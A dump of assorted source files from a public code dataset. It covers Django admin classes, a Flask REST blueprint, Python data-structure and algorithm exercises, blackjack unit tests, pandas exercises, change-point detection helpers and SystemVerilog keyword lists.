self.readonly_fields.append('partial_paid_total')\n self.readonly_fields.append('price')\n\n if 2 not in request.user.groups.all().values_list('id', flat=True) and obj is not None:\n self.readonly_fields.append('priority')\n self.readonly_fields.append('title')\n\n return super(TaskAdmin, self).get_form(request, obj, **kwargs)\n\n def save_model(self, request, obj, form, change):\n if not change and not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n obj.assignee = request.user\n\n if obj.resolved and not obj.assignee and not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n obj.assignee = request.user\n\n obj.save()\n\n def get_queryset(self, request):\n qs = super(TaskAdmin, self).get_queryset(request)\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n entrance_ids = Schedule.objects.filter(assignee=request.user, from_date__lte=datetime.datetime.now(), to_date__gte=datetime.datetime.now()).values_list('entrance_id')\n qs = qs.filter(Q(assignee=request.user) | Q(assignee__isnull=True, entrance_id__in=entrance_ids) | Q(updated_at__gte=datetime.date.today()))\n qs = qs.filter(Q(updated_at__lte=datetime.date.today()))\n return qs\n\nclass GeneratePDF(View):\n # Sketch: the original pasted PaymentAhead-style model field declarations here;\n # the invoice context below is filled from (assumed) query-string parameters instead.\n def get(self, request, *args, **kwargs):\n context = {\n \"for_apartment\": request.GET.get(\"apartment\"),\n \"for_entrance\": request.GET.get(\"entrance\"),\n \"partial_paid\": request.GET.get(\"partial_paid\"),\n \"period\": request.GET.get(\"period\"),\n \"amount\": request.GET.get(\"amount\"),\n \"cashier\": request.user,\n \"today\": datetime.date.today(),\n }\n pdf = render_to_pdf('invoice.html', context)\n if pdf:\n response = HttpResponse(pdf, content_type='application/pdf')\n filename = \"Invoice_%s.pdf\" % (\"12341231\")\n content = \"inline; filename='%s'\" % (filename)\n download = request.GET.get(\"download\")\n if download:\n content = \"attachment; filename='%s'\" % (filename)\n response['Content-Disposition'] = content\n return response\n return HttpResponse(\"Not found\")\n\n\nclass ScheduleAdmin(admin.ModelAdmin):\n def changelist_view(self, request, extra_context=None):\n if request.user.is_superuser or 4 in request.user.groups.all().values_list('id', flat=True):\n self.list_editable = ('assignee', 'from_date', 'to_date', 'visit_date')\n self.list_filter = ['assignee', EntranceListFilter]\n if 'entrance__id__exact' in request.GET:\n self.list_display = ('id','assignee', 'from_date', 'to_date', 'visit_date')\n else:\n self.list_display = ('entrance', 'assignee', 'from_date', 'to_date', 'visit_date')\n\n else:\n self.list_display = ('entrance', 'assignee', 'visit_date')\n self.list_editable = []\n self.list_filter = []\n\n return super(ScheduleAdmin, 
self).changelist_view(request, extra_context)\n\n def get_queryset(self, request):\n qs = super(ScheduleAdmin, self).get_queryset(request)\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n if 2 not in request.user.groups.all().values_list('id', flat=True):\n qs = qs.filter(assignee=request.user)\n return qs\n\n def get_form(self, request, obj=None, **kwargs):\n self.readonly_fields = ()\n self.exclude = []\n if not request.user.is_superuser and 4 not in request.user.groups.all().values_list('id', flat=True):\n self.readonly_fields = ('entrance', 'visit_date')\n self.exclude.append('from_date')\n self.exclude.append('to_date')\n self.exclude.append('assignee')\n\n return super(ScheduleAdmin, self).get_form(request, obj, **kwargs)\n\nadmin.site.register(PartialTaskPay,PartialTaskPayAdmin) #Rajdeep\n\nadmin.site.register(Task, TaskAdmin)\nadmin.site.register(Schedule, ScheduleAdmin)\nadmin.site.register(PaymentAhead, PaymentAheadAdmin)\n","repo_name":"Happyandhappy/django_email","sub_path":"tasks/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":24748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24936110286","text":"def check_capture(queen_pos, king_pos):\n r_q, r_k = queen_pos[0], king_pos[0]\n c_q, c_k = queen_pos[1], king_pos[1]\n r_min, r_max = min(r_q, r_k), max(r_q, r_k)\n c_min, c_max = min(c_q, c_k), max(c_q, c_k)\n\n if r_q == r_k:\n horizontal = board[r_q][c_min + 1:c_max]\n if all([x == \".\" for x in horizontal]):\n capturing.append([r_q, c_q])\n elif c_q == c_k:\n vertical = [board[r][c_q] for r in range(r_min + 1, r_max)]\n if all([x == \".\" for x in vertical]):\n capturing.append([r_q, c_q])\n elif r_q - c_q == r_k - c_k:\n dia_one = [board[r][c] for r in range(r_min + 1, r_max) for c in range(c_min + 1, c_max) if r - c == r_q - c_q]\n if all(x == \".\" for x in dia_one):\n capturing.append([r_q, c_q])\n elif r_q + c_q == r_k + c_k:\n dia_two = [board[r][c] for r in range(r_min + 1, r_max) for c in range(c_min + 1, c_max) if r + c == r_q + c_q]\n if all(x == \".\" for x in dia_two):\n capturing.append([r_q, c_q])\n\n\nSIZE = 8\n\nboard, queens, capturing, king_position = [], [], [], []\nking_found = False\n\nfor row in range(SIZE):\n line = input().split(\" \")\n\n for i in range(len(line)):\n if line[i] == \"Q\":\n queens.append([row, i])\n\n if not king_found:\n if \"K\" in line:\n king_position = [row, line.index(\"K\")]\n king_found = True\n\n board.append(line)\n\nfor queen in queens:\n check_capture(queen, king_position)\n\nif capturing:\n print(*capturing, sep=\"\\n\")\nelse:\n print(\"The king is safe!\")\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exams/October 2020/checkmate.py","file_name":"checkmate.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32832702172","text":"from flask import Blueprint, request\nfrom flask.json import jsonify\nfrom config_db import db\nfrom models.ente_model import Ente\nfrom schemas.ente_schema import ente_schema, enti_schema\n\nente_bp = Blueprint('ente_bp', __name__)\n\n@ente_bp.route(\"/ente\", methods=[\"GET\"])\ndef get_enti():\n all_enti = Ente.query.all()\n result = enti_schema.dump(all_enti)\n return jsonify(result)\n\n@ente_bp.route(\"/ente\", methods=[\"POST\"])\ndef add_ente():\n id_citta = request.json['id_citta']\n nome = request.json['nome']\n email = 
request.json['email']\n telefono = request.json['telefono']\n via = request.json['via']\n civico = request.json['civico']\n cap = request.json['cap']\n \n\n new_ente = Ente(id_citta, nome, email, telefono, via, civico, cap)\n db.session.add(new_ente)\n db.session.commit()\n return ente_schema.jsonify(new_ente)\n\n@ente_bp.route(\"/ente/\", methods=[\"GET\"])\ndef get_ente(id):\n ente = Ente.query.get(id)\n return ente_schema.jsonify(ente)\n\n@ente_bp.route(\"/ente/\", methods=[\"PUT\"])\ndef update_ente(id):\n ente = Ente.query.get(id)\n ente.id_citta = request.json['id_citta']\n ente.nome = request.json['nome']\n ente.email = request.json['email']\n ente.telefono = request.json['telefono']\n ente.via = request.json['via']\n ente.civico = request.json['civico']\n ente.cap = request.json['cap']\n \n db.session.commit()\n return ente_schema.jsonify(ente)\n\n@ente_bp.route(\"/ente/\", methods=['DELETE'])\ndef delete_ente(id):\n ente = Ente.query.get(id)\n db.session.delete(ente)\n db.session.commit()\n return ente_schema.jsonify(ente)","repo_name":"BernardoDePietro/SCD_blockchain_permissioned","sub_path":"fabric-samples/unime/api/blueprints/ente.py","file_name":"ente.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74453438246","text":"\nfrom collections import deque\nfrom typing import Deque\n\n\nclass LinkedList:\n class Node :\n def __init__(self,data,next = None) :\n self.data = data\n if next is None :\n self.next = None\n else :\n self.next = next\n \n def __str__(self) :\n return str(self.data)\n\n def __init__(self,head = None):\n if head == None:\n self.head = self.tail = None\n self.size = 0\n else:\n self.head = head\n t = self.head \n self.size = 1\n while t.next != None :\n t = t.next\n self.size += 1\n self.tail = t\n \n def __str__(self) :\n # s = 'Linked data : '\n s = ''\n p = self.head\n while p != None :\n s += str(p.data)+' '\n p = p.next\n return s\n\n def __len__(self) :\n return self.size\n \n def append(self, data):\n p = self.Node(data)\n if self.head == None:\n self.head = self.tail = p\n else:\n t = self.tail\n t.next = p \n self.tail =p \n self.size += 1\n\n def removeHead(self) :\n if self.head == None : return\n if self.head.next == None :\n p = self.head\n self.head = None\n else :\n p = self.head\n self.head = self.head.next\n self.size -= 1\n return p.data\n \n def isEmpty(self) :\n return self.size == 0\n \n def nodeAt(self,i) :\n p = self.head\n for j in range(i) :\n p = p.next\n return p\n\n def reverse(self) :\n if self.isEmpty() :\n return\n\n else :\n p = self.head\n prev = None\n while p != None :\n n = p.next\n p.next = prev\n prev = p\n p = n\n self.head = prev\n return\n\n def check(self, data) :\n p = self.head\n if self.isEmpty() :\n return 0\n else :\n while p.next != None :\n if p.data == data :\n return 1\n p = p.next\n if p.data == data :\n return 1\n return 0\n\nclass Queue() :\n def __init__(self) :\n self._list = LinkedList()\n\n def __str__(self) :\n if not self.isEmpty() :\n result = ''\n for i in range(len(self._list)-1) :\n _data = self._list.nodeAt(i).data\n result += str(_data) + ' <- '\n return result + str(self._list.tail.data)\n return 'Empty Queue'\n\n def enQueue(self, data) :\n self._list.append(data)\n\n def deQueue(self) :\n # if not self.isEmpty() :\n return self._list.removeHead()\n # return\n\n def __len__(self) :\n return len(self._list)\n\n def isEmpty(self) :\n return len(self._list) == 0\n\n def checkDup(self) :\n\n 
_check = LinkedList()\n for i in range(len(self._list)) :\n _data = self._list.nodeAt(i).data\n if _check.check(_data) == 0 :\n _check.append(_data)\n else :\n return 'Duplicate'\n return 'NO Duplicate'\n\n def zero(self) :\n '''\n *** Re order ***\n Enter Input : 2 3 1 0 4 5 6\n Before : 2 <- 3 <- 1 <- 0 <- 4 <- 5 <- 6\n After : 0 <- 4 <- 5 <- 6 <- 2 <- 3 <- 1\n '''\n # rotate the queue until a 0 is at the head; leave it unchanged when it contains no 0\n if self.isEmpty() or self._list.check(0) == 0 :\n return\n while self._list.head.data != 0 :\n self.enQueue(self.deQueue())\n return\n\nif __name__ == '__main__' :\n _input = input(' *** Re order ***\\nEnter Input : ').split()\n\n q = Queue()\n for i in _input :\n q.enQueue(int(i))\n print(f\"Before : {q}\")\n q.zero()\n print(f\"After : {q}\")\n\n\n'''\nChapter : 14 - item : 4 - Exam_SQL_2_4aa\nSubmitted 0 times so far\nWrite a program that reorders the numbers entered as input so that the output starts at the\nelement 0 and continues with the tail of the sequence, followed by the part that originally\ncame before the 0, as in the examples below.\nThis program must be implemented with a singly linked list.\n\nExamples\n\nEnter Input : 2 3 1 0 4 5 6\nBefore : 2 <- 3 <- 1 <- 0 <- 4 <- 5 <- 6\nAfter : 0 <- 4 <- 5 <- 6 <- 2 <- 3 <- 1\n\nEnter Input : 1 0\nBefore : 1 <- 0\nAfter : 0 <- 1\n\nEnter Input : 0 1 2 3 4 5 6 7 8 9\nBefore : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9\nAfter : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9\n\nEnter Input : 1 2 3 0\nBefore : 1 <- 2 <- 3 <- 0\nAfter : 0 <- 1 <- 2 <- 3\n'''\n\n# *** Re order ***\n# Enter Input : 2 3 1 0 4 5 6\n# Before : 2 <- 3 <- 1 <- 0 <- 4 <- 5 <- 6\n# After : 0 <- 4 <- 5 <- 6 <- 2 <- 3 <- 1\n\n# *** Re order ***\n# Enter Input : 1 0\n# Before : 1 <- 0\n# After : 0 <- 1\n\n# *** Re order ***\n# Enter Input : 1 2 3 0\n# Before : 1 <- 2 <- 3 <- 0\n# After : 0 <- 1 <- 2 <- 3\n\n# *** Re order ***\n# Enter Input : 0 1 2 3 4 5 6 7 8 9\n# Before : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9\n# After : 0 <- 1 <- 2 <- 3 <- 4 <- 5 <- 6 <- 7 <- 8 <- 9","repo_name":"Charonyx/DataStruct2564","sub_path":"Exam02 Stack Queue LinkedList/exam02_04.py","file_name":"exam02_04.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"73953905769","text":"\n\nclass Solution:\n \n def getFirst(self, nums, target):\n left = 0\n right = len(nums) - 1\n while left <= right:\n mid = (left+right) // 2\n if nums[mid] == target:\n if mid == 0 or nums[mid-1] != target:\n return mid\n right = mid - 1\n elif nums[mid] > target:\n right = mid - 1\n else:\n left = mid + 1\n \n return -1\n \n def getSecond(self, nums, target):\n left = 0\n right = len(nums) - 1\n \n while left <= right:\n mid = (left+right) // 2\n if nums[mid] == target:\n if mid == len(nums)-1 or nums[mid+1] != target:\n return mid\n left = mid + 1\n elif nums[mid] > 
target:\n right = mid - 1\n else:\n left = mid + 1\n \n return -1\n \n def getSecond(self, nums, target):\n left = 0\n right = len(nums) - 1\n \n while left <= right:\n mid = (left+right) // 2\n if nums[mid] == target:\n if mid == len(nums)-1 or nums[mid+1] != target:\n return mid\n left = mid + 1\n elif nums[mid] > target:\n right = mid - 1\n else:\n left = mid + 1\n return -1\n \n def searchRange(self, nums, target):\n first = self.getFirst(nums, target)\n second = self.getSecond(nums, target)\n \n return [first, second]\n\n\nsol = Solution()\n\nprint(sol.searchRange([5,7,7,8,8,10], 8))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/BinarySearch/findFirstAndLastPositionOfElement.py","file_name":"findFirstAndLastPositionOfElement.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21375341189","text":"from unittest import mock, TestCase, main\nfrom vizyb.blackjack.blackjack import *\n\n\nclass Testing(TestCase):\n \"\"\" python3 -m unittest vizyb.blackjack.blackjack_tests.Testing \"\"\"\n\n def setUp(self):\n self.gambler = Gambler()\n self.player = Player()\n self.deck = Deck()\n self.deck.shuffle_deck()\n self.dealer = Dealer()\n self.dealer.deck.shuffle_deck()\n\n def test_card(self):\n card = Card(\"6\", \"Spades\")\n self.assertEqual(card.numerical_value(), 6)\n card = Card(\"J\", \"Hearts\")\n self.assertEqual(card.numerical_value(), 10) # Assert faced values\n card = Card(\"1\", \"Jacks\")\n self.assertEqual(card.numerical_value(), 1)\n\n def test_deck(self):\n self.assertEqual(len(self.deck.cards), 52) # Assert full deck\n deck_cards_order = str(self.deck.cards)\n self.deck.shuffle_deck()\n self.assertNotEqual(deck_cards_order, str(self.deck.cards)) # Assert shuffle works\n self.deck.cards.pop() # deal one card\n self.assertEqual(len(self.deck.cards), 51)\n self.deck.create_deck() # pick up all the cards again\n self.assertEqual(len(self.deck.cards), 52)\n\n def test_player(self):\n self.assertEqual(self.player.hand, []) # Assert hand not None\n card = self.deck.cards.pop()\n self.player.hand.append(card) # Draw card\n self.assertIn(card, self.player.hand) # Assert card in player hand\n self.player.clear_hand() # Clear hand\n self.assertNotIn(card, self.player.hand) # Assert card no longer in hand\n\n def test_dealer(self):\n self.assertEqual(len(self.dealer.deck.cards), 52) # Assert init with full deck\n\n def test_gambler(self):\n self.assertEqual(self.gambler.money, 100) # Assert start money\n # Mock interactive input module\n with mock.patch('inquirer.prompt', return_value={\"bet_quantity\": \"50\"}):\n self.assertEqual(self.gambler.make_a_bet(), 50) # Make a bet\n\n def test_validate_bet(self):\n self.assertFalse(validate_bet(self.gambler, \"1000\"))\n self.assertTrue(validate_bet(self.gambler, \"50\"))\n self.assertFalse(validate_bet(self.gambler, \"-1000\"))\n self.assertFalse(validate_bet(self.gambler, \"ABC\"))\n self.gambler.money = 1500\n self.assertTrue(validate_bet(self.gambler, \"1000\"))\n\n def test_count_values(self):\n card1 = Card('J', 'Spades')\n self.player.hand.append(card1) # Draw card\n card2 = Card('Q', 'Hearts')\n self.player.hand.append(card2) # Draw card\n self.assertEqual(count_values(self.player), card1.numerical_value() + card2.numerical_value())\n self.player.clear_hand()\n card1 = Card('10', 'Spades')\n self.player.hand.append(card1) # Draw card\n card2 = Card('1', 'Clubs')\n self.player.hand.append(card2) # Draw card\n 
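# count_values should promote a lone Ace ('1' -> 11) when it does not bust the hand, so 10 + A == 21\n 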
self.assertEqual(count_values(self.player), 21)\n\n def test_play_a_round(self):\n with mock.patch('inquirer.prompt', return_value={\"draw\": \"Stay\"}):\n play_a_round(self.dealer, self.gambler, 50) # Player bets 50\n # We are stubbing prompt, so the player only drew 2 cards and is therefore <= 21\n self.assertLessEqual(count_values(self.gambler), 21)\n if count_values(self.gambler) != 21: # if the player didn't blackjack, the dealer should be >= 17\n self.assertGreaterEqual(count_values(self.dealer), 17)\n # otherwise if the player lost, he should have forfeited his bet\n elif count_values(self.gambler) < count_values(self.dealer):\n self.assertEqual(self.gambler.money, 50)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rivia-Team/Python-Coding-Projects","sub_path":"vizyb/blackjack/blackjack_tests.py","file_name":"blackjack_tests.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"22692225270","text":"N = int(input())\na1 = [\"tret\", \"jan\", \"feb\", \"mar\", \"apr\", \"may\", \"jun\", \"jly\", \"aug\", \"sep\", \"oct\", \"nov\", \"dec\"]\na2 = [\"tret\", \"tam\", \"hel\", \"maa\", \"huh\", \"tou\", \"kes\", \"hei\", \"elo\", \"syy\", \"lok\", \"mer\", \"jou\"]\n\n\ndef deci_to_base(n):\n s = \"\"\n if n%13 == 0:\n return a2[n//13]\n s = a1[n%13] + s\n if n//13 > 0:\n s = a2[n//13] + ' ' + s\n return s\n\ndef base_to_deci(sl):\n n = 0\n for i in sl:\n if i in a1:\n n += a1.index(i)\n else:\n n += a2.index(i)*13\n return n\n\nif __name__ == \"__main__\":\n for _ in range(N):\n n = input()\n if n.isdigit():\n print(deci_to_base(int(n)))\n else:\n print(base_to_deci(n.split()))","repo_name":"xiaoyuzaijia/PAT_Advance_level","sub_path":"1100 Mars Numbers.py","file_name":"1100 Mars Numbers.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"31109872902","text":"import pandas as pd\n\n# Read the csv\ndf = pd.read_csv('auto.csv')\n\n# Keep only the rows with 'mpg' of at least 16\nfiltered = df.query('mpg >= 16')\n# Another solution\ndf[df.mpg >= 16]\nprint(filtered.head())\n\n# Get the first 7 rows of the columns 'weight' and 'acceleration'\nfirst7 = df[['weight', 'acceleration']][:7]\n# Or\nfirst7 = df[['weight', 'acceleration']].head(7)\n
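\n# Note: [:7] and .head(7) return the same first seven rows; .head() reads more idiomatically.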
\n# Remove the rows where the 'horsepower' column has the value '?' and convert the column\n# to an int type instead of a string\ncols = df[df.horsepower != '?'].copy() # .copy() avoids SettingWithCopyWarning on the assignment below\ncols['horsepower'] = cols['horsepower'].astype(int)\n\n# Average of every column but name\ndf.loc[:, df.columns != 'name'].mean()\n","repo_name":"micheleberetta98/sdu-deep-learning-2021","sub_path":"day-1/es02.py","file_name":"es02.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"19001496845","text":"import numpy as np\n\nfrom .postprocessing import *\n\n\ndef smoothened_dissimilarity_measures(\n encoded_windows=None, encoded_windows_fft=None, window_size=20\n):\n \"\"\"\n Calculation of smoothened dissimilarity measures\n\n Args:\n encoded_windows: TD latent representation of windows\n encoded_windows_fft: FD latent representation of windows\n window_size: window size used\n\n Returns:\n smoothened dissimilarity measures\n \"\"\"\n if encoded_windows_fft is None:\n encoded_windows_both = encoded_windows\n elif encoded_windows is None:\n encoded_windows_both = encoded_windows_fft\n else:\n beta = np.quantile(distance(encoded_windows, window_size), 0.95)\n alpha = np.quantile(distance(encoded_windows_fft, window_size), 0.95)\n encoded_windows_both = np.concatenate(\n (encoded_windows * alpha, encoded_windows_fft * beta), axis=1\n )\n\n encoded_windows_both = matched_filter(\n encoded_windows_both, window_size\n ) # smoothing for shared features (9)\n distances = distance(encoded_windows_both, window_size)\n distances = matched_filter(\n distances, window_size\n ) # smoothing for dissimilarity (12)\n\n return distances\n\n\ndef change_point_score(distances, window_size):\n \"\"\"\n Gives the change point score for each time stamp. A change point score > 0 indicates that a new segment starts at that time stamp.\n\n Args:\n distances: postprocessed dissimilarity measure for all time stamps\n window_size: window size used in TD for CPD\n\n Returns:\n change point scores for every time stamp (i.e. 
zero-padded such that length is same as length time series)\n \"\"\"\n prominences = np.array(new_peak_prominences(distances)[0])\n prominences = prominences / np.amax(prominences)\n return np.concatenate(\n (np.zeros((window_size,)), prominences, np.zeros((window_size - 1,)))\n )\n","repo_name":"caozhenxiang/ICPD","sub_path":"utils/tire/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42536476359","text":"\"\"\"\n(System)Verilog language keyword lists\n\"\"\"\n\nIEEE1364_1995_KEYWORDS = [\n \"always\",\n \"and\",\n \"assign\",\n \"begin\",\n \"buf\",\n \"bufif0\",\n \"bufif1\",\n \"case\",\n \"casex\",\n \"casez\",\n \"cmos\",\n \"deassign\",\n \"default\",\n \"defparam\",\n \"disable\",\n \"edge\",\n \"else\",\n \"end\",\n \"endcase\",\n \"endfunction\",\n \"endmodule\",\n \"endprimitive\",\n \"endspecify\",\n \"endtable\",\n \"endtask\",\n \"event\",\n \"for\",\n \"force\",\n \"forever\",\n \"fork\",\n \"function\",\n \"highz0\",\n \"highz1\",\n \"if\",\n \"ifnone\",\n \"rpmos\",\n \"initial\",\n \"rtran\",\n \"inout\",\n \"rtranif0\",\n \"input\",\n \"rtranif1\",\n \"integer\",\n \"scalared\",\n \"join\",\n \"small\",\n \"large\",\n \"specify\",\n \"macromodule\",\n \"specparam\",\n \"medium\",\n \"strong0\",\n \"module\",\n \"strong1\",\n \"nand\",\n \"supply0\",\n \"negedge\",\n \"supply1\",\n \"nmos\",\n \"table\",\n \"nor\",\n \"task\",\n \"not\",\n \"time\",\n \"notif0\",\n \"tran\",\n \"notif1\",\n \"tranif0\",\n \"or\",\n \"tranif1\",\n \"output\",\n \"tri\",\n \"parameter\",\n \"tri0\",\n \"pmos\",\n \"tri1\",\n \"posedge\",\n \"triand\",\n \"primitive\",\n \"trior\",\n \"pull0\",\n \"trireg\",\n \"pull1\",\n \"vectored\",\n \"pulldown\",\n \"wait\",\n \"pullup\",\n \"wand\",\n \"rcmos\",\n \"weak0\",\n \"real\",\n \"weak1\",\n \"realtime\",\n \"while\",\n \"reg\",\n \"wire\",\n \"release\",\n \"wor\",\n \"repeat\",\n \"xnor\",\n \"rnmos\",\n \"xor\",\n]\n\nIEEE1364_2001_KEYWORDS = IEEE1364_1995_KEYWORDS + [\n \"automatic\",\n \"cell\",\n \"config\",\n \"incdir\",\n \"include\",\n \"instance\",\n \"liblist\",\n \"library\",\n \"localparam\",\n \"noshowcancelled\",\n \"pulsestyle_ondetect\",\n \"design\",\n \"endconfig\",\n \"endgenerate\",\n \"generate\",\n \"genvar\",\n \"pulsestyle_onevent\",\n \"showcancelled\",\n \"signed\",\n \"unsigned\",\n \"use\",\n]\n\nIEEE1364_2001_NOCONFIG_KEYWORDS = [\n kw for kw in IEEE1364_2001_KEYWORDS if kw not in {\n \"cell\",\n \"config\",\n \"design\",\n \"endconfig\",\n \"incdir\",\n \"include\",\n \"instance\",\n \"liblist\",\n \"library\",\n \"use\",\n }\n]\n\nIEEE1364_2005_KEYWORDS = IEEE1364_2001_KEYWORDS + [\"uwire\"]\n\nIEEE1800_2005_KEYWORDS = IEEE1364_2005_KEYWORDS + [\n \"alias\",\n \"endsequence\",\n \"pure\",\n \"always_comb\",\n \"enum\",\n \"rand\",\n \"always_ff\",\n \"expect\",\n \"randc\",\n \"always_latch\",\n \"export\",\n \"randcase\",\n \"assert\",\n \"extends\",\n \"randsequence\",\n \"assume\",\n \"extern\",\n \"ref\",\n \"before\",\n \"final\",\n \"return\",\n \"bind\",\n \"first_match\",\n \"sequence\",\n \"bins\",\n \"foreach\",\n \"shortint\",\n \"binsof\",\n \"forkjoin\",\n \"shortreal\",\n \"bit\",\n \"iff\",\n \"solve\",\n \"break\",\n \"ignore_bins\",\n \"static\",\n \"byte\",\n \"illegal_bins\",\n \"string\",\n \"chandle\",\n \"import\",\n \"struct\",\n \"class\",\n \"inside\",\n \"super\",\n \"clocking\",\n \"int\",\n \"tagged\",\n \"const\",\n \"interface\",\n 
\"this\",\n \"constraint\",\n \"intersect\",\n \"throughout\",\n \"context\",\n \"join_any\",\n \"timeprecision\",\n \"continue\",\n \"join_none\",\n \"timeunit\",\n \"cover\",\n \"local\",\n \"type\",\n \"covergroup\",\n \"logic\",\n \"typedef\",\n \"coverpoint\",\n \"longint\",\n \"union\",\n \"cross\",\n \"matches\",\n \"unique\",\n \"dist\",\n \"modport\",\n \"var\",\n \"do\",\n \"new\",\n \"virtual\",\n \"endclass\",\n \"null\",\n \"void\",\n \"endclocking\",\n \"package\",\n \"wait_order\",\n \"endgroup\",\n \"packed\",\n \"wildcard\",\n \"endinterface\",\n \"priority\",\n \"with\",\n \"endpackage\",\n \"program\",\n \"within\",\n \"endprogram\",\n \"property\",\n \"endproperty\",\n \"protected\",\n]\n\nIEEE1800_2009_KEYWORDS = IEEE1800_2005_KEYWORDS + [\n \"accept_on\",\n \"checker\",\n \"endchecker\",\n \"eventually\",\n \"global\",\n \"implies\",\n \"let\",\n \"nexttime\",\n \"reject_on\",\n \"restrict\",\n \"s_always\",\n \"s_eventually\",\n \"s_nexttime\",\n \"s_until\",\n \"s_until_with\",\n \"strong\",\n \"sync_accept_on\",\n \"sync_reject_on\",\n \"unique0\",\n \"until\",\n \"until_with\",\n \"untyped\",\n \"weak\",\n]\n\nIEEE1800_2012_KEYWORDS = IEEE1800_2009_KEYWORDS + [\n \"implements\",\n \"nettype\",\n \"interconnect\",\n \"soft\",\n]\n\nIEEE1800_2017_KEYWORDS = IEEE1800_2012_KEYWORDS + [\n]\n\nIEEE1800_2017_DOLAR_SYMBOLS = [\n #Simulation control tasks (20.2) \n '$finish',\n '$stop',\n '$exit',\n # Simulation time functions (20.3)\n '$realtime',\n '$stime',\n '$time',\n # Timescale tasks (20.4)',\n '$printtimescale',\n '$timeformat',\n # Conversion functions (20.5)',\n '$bitstoreal',\n '$realtobits',\n '$bitstoshortreal',\n '$shortrealtobits',\n '$itor',\n '$rtoi',\n '$signed',\n '$unsigned',\n '$cast',\n # Data query functions (20.6)\n '$bits',\n '$isunbounded',\n '$typename',\n # Array query functions (20.7)\n '$unpacked_dimensions',\n '$dimensions',\n '$left',\n '$right',\n '$low',\n '$high',\n '$increment'\n '$size',\n # Math functions (20.8)\n '$clog2',\n '$asin',\n '$ln',\n '$acos',\n '$log10',\n '$atan',\n '$exp',\n '$atan2',\n '$sqrt',\n '$hypot',\n '$pow',\n '$sinh',\n '$floor',\n '$cosh',\n '$ceil',\n '$tanh',\n '$sin',\n '$asinh',\n '$cos',\n '$acosh',\n '$tan',\n '$atanh',\n # Bit vector system functions (20.9)\n '$countbits',\n '$countones',\n '$onehot',\n '$onehot0',\n '$isunknown',\n # Severity tasks (20.10)\n # Elaboration tasks (20.11)\n '$fatal',\n '$error',\n '$warning',\n '$info',\n # Assertion control tasks (20.12)\n '$asserton',\n '$assertoff',\n '$assertkill',\n '$assertcontrol',\n '$assertpasson',\n '$assertpassoff',\n '$assertfailon',\n '$assertfailoff',\n '$assertnonvacuouson',\n '$assertvacuousoff',\n # Sampled value system functions (20.13)\n '$sampled',\n '$rose',\n '$fell',\n '$stable',\n '$changed',\n '$past',\n '$past_gclk',\n '$rose_gclk',\n '$fell_gclk',\n '$stable_gclk',\n '$changed_gclk',\n '$future_gclk',\n '$rising_gclk',\n '$falling_gclk',\n '$steady_gclk',\n '$changing_gclk',\n # Coverage control functions (20.14)\n '$coverage_control',\n '$coverage_get_max',\n '$coverage_get',\n '$coverage_merge',\n '$coverage_save',\n '$get_coverage',\n '$set_coverage_db_name',\n '$load_coverage_db',\n # Probabilistic distribution functions (20.15)\n '$random',\n '$dist_chi_square',\n '$dist_erlang',\n '$dist_exponential',\n '$dist_normal',\n '$dist_poisson',\n '$dist_t',\n '$dist_uniform',\n # Stochastic analysis tasks and functions (20.16)\n '$q_initialize',\n '$q_add',\n '$q_remove',\n '$q_full',\n '$q_exam',\n # PLA modeling tasks (20.17)\n 
'$async$and$array',\n '$async$and$plane',\n '$async$nand$array',\n '$async$nand$plane',\n '$async$or$array',\n '$async$or$plane',\n '$async$nor$array',\n '$async$nor$plane',\n '$sync$and$array',\n '$sync$and$plane',\n '$sync$nand$array',\n '$sync$nand$plane',\n '$sync$or$array',\n '$sync$or$plane',\n '$sync$nor$array',\n '$sync$nor$plane',\n # Miscellaneous tasks and functions (20.18)\n '$system',\n #Display tasks (21.2)\n '$display',\n '$write',\n '$displayb',\n '$writeb',\n '$displayh',\n '$writeh ',\n '$displayo',\n '$writeo',\n '$strobe',\n '$monitor ',\n '$strobeb',\n '$monitorb',\n '$strobeh',\n '$monitorh',\n '$strobeo',\n '$monitoro',\n '$monitoroff',\n '$monitoron',\n # File I/O tasks and functions (21.3)\n '$fclose',\n '$fopen',\n '$fdisplay',\n '$fwrite',\n '$fdisplayb',\n '$fwriteb',\n '$fdisplayh',\n '$fwriteh ',\n '$fdisplayo',\n '$fwriteo',\n '$fstrobe',\n '$fmonitor ',\n '$fstrobeb',\n '$fmonitorb',\n '$fstrobeh',\n '$fmonitorh',\n '$fstrobeo',\n '$fmonitoro',\n '$swrite',\n '$sformat',\n '$swriteb',\n '$sformatf ',\n '$swriteh',\n '$fgetc',\n '$swriteo',\n 